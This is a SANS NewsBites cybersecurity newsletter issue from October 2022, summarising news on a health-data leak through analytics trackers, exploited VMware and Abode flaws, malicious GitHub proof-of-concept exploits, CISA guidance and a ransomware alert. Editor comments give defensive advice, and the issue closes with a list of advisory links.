SANS NewsBites

Educate Web Admins on Data Leakage Risk of Analytics Tools; Patch VMware Now to Stop Active Exploits; Beware of Malicious Proof-of-Concept Code on GitHub and Other Repositories

October 25, 2022  |  Volume XXIV - Issue #83

Top of the News


2022-10-24

Analytics Code May Have Leaked Personal Health Data

The Advocate Aurora Health (AAH) network, which operates in Wisconsin and Illinois, has reported a data breach to the US Department of health and Human Services (HHS) Office of Civil Rights. AAH says that the analytics code it was using on its online portals may have leaked patient data to third parties, including Meta and Google. The incident affects three million individuals.

Editor's Note

There has been a lot of movement in recent years by software architects to include privacy as part of their DevOps requirements, but they don’t always understand the complexity of how much data is being leaked, or where it is being leaked to, in the tools that are used to maintain those web sites once they go production. This piece is a good one to use to show the CIO and get security expertise integrated into that aspect of DevOps.

John Pescatore
John Pescatore

The organization was using tracking services from Google, Facebook and others. Depending on how a user’s browser was configured and logged into the third-party services, obtained data may have included first and last names, dates, times and types of scheduled appointments or procedures and insurance information, underscoring the importance of knowing what data is shared when you're deploying tracking or other analytics supporting information on customer facing web sites. Keep in mind the data collected could fall into PII or PHI which can get you crossways with regulators and regulations (GDPR, CCPA, HIPAA, etc.) At a minimum, exclude them from pages where sensitive information is collected or displayed.

Lee Neely
Lee Neely

2022-10-21

VMware Vulnerability is Being Exploited in Malware Campaigns

Researchers from Fortinet have detected malware campaigns that are exploiting a known remote code execution vulnerability in VMware Workspace ONE Access. The flaw, for which VMware issued a patch in April, is being exploited to spread ransomware and install cryptominers. Fortinet researchers noted a sudden spike in attempts to exploit the vulnerability in August.

Editor's Note

Just as many enterprises have been slow to patch routers and switches because of the need to bring the network down to do so, VMware patching is often too slow. In the April patch release VMware said these vulnerabilities enabled remote code injection and attacks had been seen in the wild back in April. Should have been a high priority patch.

John Pescatore
John Pescatore

We all hate patching servers because of the mission impact. The good news is that you can typically update VMware Tools without a reboot, and with proper configuration, move services to other servers so you can patch the running hypervisor. That leaves the VMware services themselves, often appliances just humming along. Guess what - you need to fix them too. Make sure that you have a policy which sets limits on applying patches, with supporting scans and consequences. Question excuses that there is no way a particular vulnerable component can be exploited carefully.

Lee Neely
Lee Neely

2022-10-23

GitHub Repositories with Phony PoCs and Malware

In a technical paper published earlier this month, researchers from Leiden Institute of Advanced Computer Science present findings from their study of the distribution of malicious proof-of-concept exploits on GitHub. In their paper, the researchers write, “We have proposed an approach to detect if a PoC is malicious … [that] relies on detecting the symptoms we have observed in the collected dataset, for example, calls to malicious IP addresses, encoded malicious code, or included Trojanized binaries. With this approach, we have discovered 4893 malicious repository out of 47313 repositories that have been downloaded and checked (i.e., 10.3% of the studied repositories have symptoms of malicious intent). This figure shows a worrying prevalence of dangerous malicious PoCs among the exploit code distributed on GitHub.”

Editor's Note

Fake exploits have a long history, and more recently, GitHub has become the favorite place to post real as well as fake exploits. Whenever you download an exploit, no matter if it comes from GitHub or other sources, first try to understand what the code is doing and be suspicious if parts of the code are particularly obfuscated or hard to read. Even once you review the exploit, run it with caution on isolated machines.

Johannes Ullrich
Johannes Ullrich

I know you want to download the exploit PoC and try it out in your lab. The message here is that they are often loaded with added malware you’re not expecting. Make sure you fully understand any obfuscated or binary code downloaded before executing it. Leverage OSINT tools like VirusTotal to analyze binaries. Also beware of network connections made / attempted in the lab in case the code is calling for more components or phoning a friend.

Lee Neely
Lee Neely

The Rest of the Week's News


2022-10-21

CISA’s Critical Infrastructure Cybersecurity Sector Focus for 2023: Water, Hospitals, K-12

Speaking to an audience at the Mandiant mWISE cybersecurity conference last week, Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly said that her agency will concentrate on the water, health, and education sectors over the next year, three areas of focus that are identified as being “target-rich, resource-poor entities.” IN 2020, CISA identified 16 critical infrastructure sectors that need cybersecurity attention. The education sector is not included in that list, but it is a broad target and often hit with ransomware attacks. Easterly also said that CISA plans to publish cross-sector cybersecurity performance goals, developed with the National Institute of Standards and Technology (NIST), next week.

Editor's Note

This continues the focus on critical infrastructure, as promised. This also focuses on the model that these critical sector components are tight on resources and funding, which hopefully will either result in low-cost guidance and/or funded services to help raise the bar without creating a regulatory impossible dream. If nothing else, guidance can be leveraged to help self-assessments to a risk-based approach to making (affordable) improvements.

Lee Neely
Lee Neely

2022-10-24

CISA Releases Microsoft 365 Security Configurations Baseline Recommendations

The US Cybersecurity and Infrastructure Security Agency (CISA) has released security configuration baseline recommendations for Microsoft 365 cloud services. The recommendations are part of CISA’s Secure Cloud Business Application (SCuBA) project, which was launched in April of this year. CISA is accepting public comment on the recommendations through November 24.

Editor's Note

The Center for Internet Security has published and widely used consensus configuration benchmarks for Office 365 and many other cloud services. Full list at https://learn.cisecurity.org/benchmarks

John Pescatore
John Pescatore

The SCuBA project’s initial scope is Microsoft 365 and Google Web Services and an automated tool to perform assessments. Over time they expect to grow to other environments. They are basing their reference model on many existing directives including CISA cloud security guidance (CDM, Zero Trust, Cloud Security TRA), Federal cloud security guidance (FedRAMP, OMB Zero Trust M-22-09, OMB logging (M-21-31) and Federal ICAM architecture. All in all giving an overview of how all these fit together to not only aid security but also aid in incident response. Two risks - having visibility to the data needed, such as CDM and your cloud service providing needed/timely log data to your SIEM. Even so, if you’re in the federal space, review the document and provide feedback to QSMO@CISA.dhs.gov.

Lee Neely
Lee Neely

2022-10-24

Trend Micro: Analysis of Security Issues in Computer Numerical Control Machines

Trend Micro researchers have analyzed computer numerical control (CNC) products from several manufacturers for vulnerabilities to various cyberthreats. The machines were found to be vulnerable to attacks that could cause physical damage, denial-of-service attacks, hijacking, and data theft. Trend Micro will present its findings in a paper, The Security Risks Faced by CNC Machines in Industry 4.0, at the Security Week 2022 ICS Security Conference this week.

Editor's Note

CNC machines are driven by computers with full operating systems. They are designed to last a long time, with that same OS. But that doesn’t mean they are secure enough to be on your network, let alone able to reach the Internet. Isolate (segment) and monitor them, apply patches when released. Only apply supported patches to avoid “bricking” a very expensive device. Don’t expect security improvements in a newer model, the OS supplied is selected for its ability to run the CNC machine, not security.

Lee Neely
Lee Neely

Purpose-built machines should be easier to secure than more flexible general-purpose machines. Unfortunately, that is not the result we see. This results in part from the fact that these systems are built by those expert in the purpose but naive about security, in part because they incorporate general purpose components.

William Hugh Murray
William Hugh Murray

2022-10-24

UK’s Information Commissioner Fines Firm Over Inadequate Security

The UK Information Commissioner’s Office (ICO) has fined Interserve Group Limited, a facilities management outsourcing and construction firm, £4.4 million ($5 million) for failing to implement adequate security measures prior to a 2020 cybersecurity incident. Intruders gained access to Interserve’s systems and compromised information belonging to 113,000 employees. The ICO says that at the time of the incident, Interserve was running unsupported versions of Windows Server and outdated versions of antivirus software.

Editor's Note

This is the fourth largest fine imposed by ICO. The intent is to induce careful consideration of the cyber security of business partners. When was the last time you assessed the security of services you’re using to share or process information, particularly business sensitive or regulated data? Can they demonstrate they are keeping services updated and current? Do you know how your data is separated from other customers’ data and is that sufficient? Don’t exclude your cloud services or hosted infrastructure. Consider the level of access their staff has to your data, physical and logical.

Lee Neely
Lee Neely

2022-10-24

#StopRansomware Alert from CISA, FBI, HHS: Daixin Team

A joint alert from the US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS) warns about the activity of the Daixin cybercrime group, which has been targeting healthcare-related organizations with ransomware. The alert includes indicators of compromised (IoCs) and suggested mitigations.

Editor's Note

Initial access is gained by VPN servers; either exploiting a weakness or leveraging captured credentials. Then lateral movement leverages RDP and SSH. A good first step here is to make sure that your VPN is MFA required. While you’re verifying that is the case, make sure that they are being patched and updated. Nobody likes an interruption of the VPN, and the breach hurts more. Keep your VPN current, and don’t leave the old-unsupported (exploitable) units around “just in case;” make sure lifecycle includes sufficient redundancy for fail-over during maintenance windows.

Lee Neely
Lee Neely

2022-10-24

Abode Iota Home Security Vulnerabilities

Abode has made fixes available to address vulnerabilities in its Iota All-In-One Security Kit. Researchers from Cisco’s Talos Intelligence detected the flaws in July; Abode released fixes earlier this fall. One of the flaws, a critical authentication bypass vulnerability in the UDP service communications protocol, could be exploited to turn off security cameras.

Editor's Note

There are a couple of authentication bypass flaws, a memory corruption vulnerability, and a code injection flaw. The good news is that updating to the latest version of the All-in-One Security kit fixes the flaws. Don’t wait on your round-to-it here, the flaw can be leveraged to take over items like your security cameras, which would be “bad.” Make sure that patches for security systems are up there with your patching of boundary protection devices in terms of priority and criticality.

Lee Neely
Lee Neely

Internet Storm Center Tech Corner

C2 Communications Through Outlook.com

https://isc.sans.edu/forums/diary/C2+Communications+Through+outlookcom/29180


Apple Patches Everything October 2022 Edition

https://isc.sans.edu/forums/diary/Apple+Patches+Everything+October+2022+Edition/29182


Sczriptzzbn Inject Pushes Malware for NetSupport RAT

https://isc.sans.edu/diary/sczriptzzbn+inject+pushes+malware+for+NetSupport+RAT/29170/


rtfdump find options

https://isc.sans.edu/forums/diary/rtfdumps+Find+Option/29174


F5 Patches

https://support.f5.com/csp/article/K11830089

https://support.f5.com/csp/article/K30425568


Cisco ISE Patch

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-path-trav-Dz5dpzyM


Synology Updates

https://www.synology.com/en-global/security/advisory/Synology_SA_22_17


A study of malicious CVE proof of concept exploits in GitHub

https://arxiv.org/pdf/2210.08374.pdf


Exploited Windows Zero Day Lets JavaScript Files Bypass Security Warnings

https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/


Dormant Colors Live Campaign With Over 1m Data Stealing Extensions Installed

https://guardiosecurity.medium.com/dormant-colors-live-campaign-with-over-1m-data-stealing-extensions-installed-9a9a459b5849